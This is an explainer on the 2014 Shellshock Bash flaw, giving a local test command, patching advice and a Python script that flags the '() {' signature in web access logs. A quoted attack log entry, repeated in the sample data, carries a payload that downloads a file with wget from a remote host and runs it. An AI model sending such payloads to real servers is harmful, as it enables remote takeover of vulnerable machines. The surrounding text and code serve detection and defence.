Shellshock

We explain what the Shellshock Bash bug is and how to deal with it.

Technology is always under the threat of viruses and security vulnerabilities. The latest one to hit the headlines is Shellshock so here's what you need to know about the Bash bug and what you can do about it.

What is Shellshock and Bash?

Shellshock is a flaw in a software component known as Bash. The flaw allows malicious code executed within the Bash shell to take over an operating system and, in turn, gain access to any data on the machine.

Bash stands for 'Bourne Again Shell', which is a command line shell allowing users to launch applications by typing text commands.

Although the vulnerability has only just been discovered, Bash was released way back in 1989, so has been theoretically exploitable for the last 25 years.

Does Shellshock affect me?

Users running Linux and Mac OS X on their PCs are at risk. However, it's more likely that web servers running Apache with legacy scripts executed as CGI will be the target.

Although Windows is thought to be safe, Bitdefender says: "While it's hard to believe that the internet at large will be majorly affected by this Bash flaw as the patch will be soon made available, the attack could affect any system using the Bash Shell, including Windows."

How can I check if my system is vulnerable to Shellshock?

If you're worried about Shellshock, there is a simple check you can perform to see if your system is vulnerable. Open a terminal on your desktop and type the following command:

env x='() { :;}; echo vulnerable' bash -c 'echo hello'

If your system is vulnerable, then you will see this message:

"vulnerable"
"hello"

If it is not vulnerable you will see this message:

"bash: warning: x: ignoring function definition attempt"
"bash: error importing function definition for 'x'"

Shellshock bug: What do I do now?

If you are shown the string 'vulnerable' when you run the above check then you should update your system and patch your bash version.

Kaspersky recommends that if you are using any IDS/IPS, you add/load a signature for this. A lot of public rules have been published.

Also check your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.

How to check if you are a victim of Shellshock

As well as checking whether you're vulnerable, you can review your HTTP logs to check for any suspicious activity. Kaspersky gives the following example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

"There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won’t prevent someone from exploiting this vulnerability, but it will log the attacker's actions on the system," added the firm.

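To search a whole access log for entries like the one Kaspersky quotes, the following added example (not from the article or from Kaspersky) flags any quoted log field containing the "() {" function-definition marker. The function name, field labels and all sample entries except the second are assumptions made for this illustration.

```python
import re

# Prefix of an exported Bash function definition, the marker seen in Shellshock
# probes. Spacing between "()" and "{" varies, so allow any whitespace.
SIGNATURE = re.compile(r"\(\)\s*\{")
PREFIX = re.compile(r"^(\S+) \S+ \S+ \[([^\]]+)\] (.*)$")  # ip, [time], rest
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted fields, tolerating \" escapes
STATUS = re.compile(r'" (\d{3}) ')           # status code after the request line
FIELD_NAMES = ("request", "referer", "user-agent")  # labels assumed for this example

# Constructed sample log. Entry 2 is the pattern quoted in the article; the
# other entries are made up for this example.
SAMPLE_LOG = '''\
203.0.113.5 - - [25/Sep/2014:13:59:58 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"
198.51.100.7 - - [25/Sep/2014:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "(){ :;}; echo probe"
203.0.113.5 - - [25/Sep/2014:14:03:40 +0000] "GET /js/app.js?cb=f() HTTP/1.1" 200 910 "-" "Mozilla/5.0"
'''


def find_shellshock_attempts(log_text):
    """Return one dict per access-log entry whose quoted fields carry the marker."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = PREFIX.match(line)
        if not m:
            continue  # skip anything that is not an access-log entry
        ip, when, rest = m.groups()
        status = STATUS.search(rest)
        for idx, field in enumerate(QUOTED.findall(rest)):
            if SIGNATURE.search(field):
                name = FIELD_NAMES[idx] if idx < len(FIELD_NAMES) else f"field{idx}"
                hits.append({"line": lineno, "ip": ip, "time": when, "field": name,
                             "status": int(status.group(1)) if status else None,
                             "payload": field})
                break  # one report per entry is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

A clean result only covers what the server logs: a combined-format log records the request line, Referer and User-Agent, so probes sent in other headers leave no trace here. A hit shows an attempt; whether it succeeded depends on whether the request reached a CGI script run by a vulnerable Bash.
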
Is it bigger than Heartbleed?

It's currently debatable whether Shellshock is bigger than Heartbleed. Around 500,000 machines were vulnerable to Heartbleed and early estimates suggest Shellshock could hit 500 million, according to the BBC.

However, Bitdefender claims that this new threat is simply a 'mini-Heartbleed' because the exploitation is "only possible in certain scenarios on these systems".

"To start with, remote hackers can only target servers running CGI scripts and pass environment variables whereas, in Heartbleed’s case, they interacted more easily with the server. Network-based exploitation is also possible, but it is limited to specific scenarios," said Bogdan Botezatu, senior e-threat specialist at Bitdefender.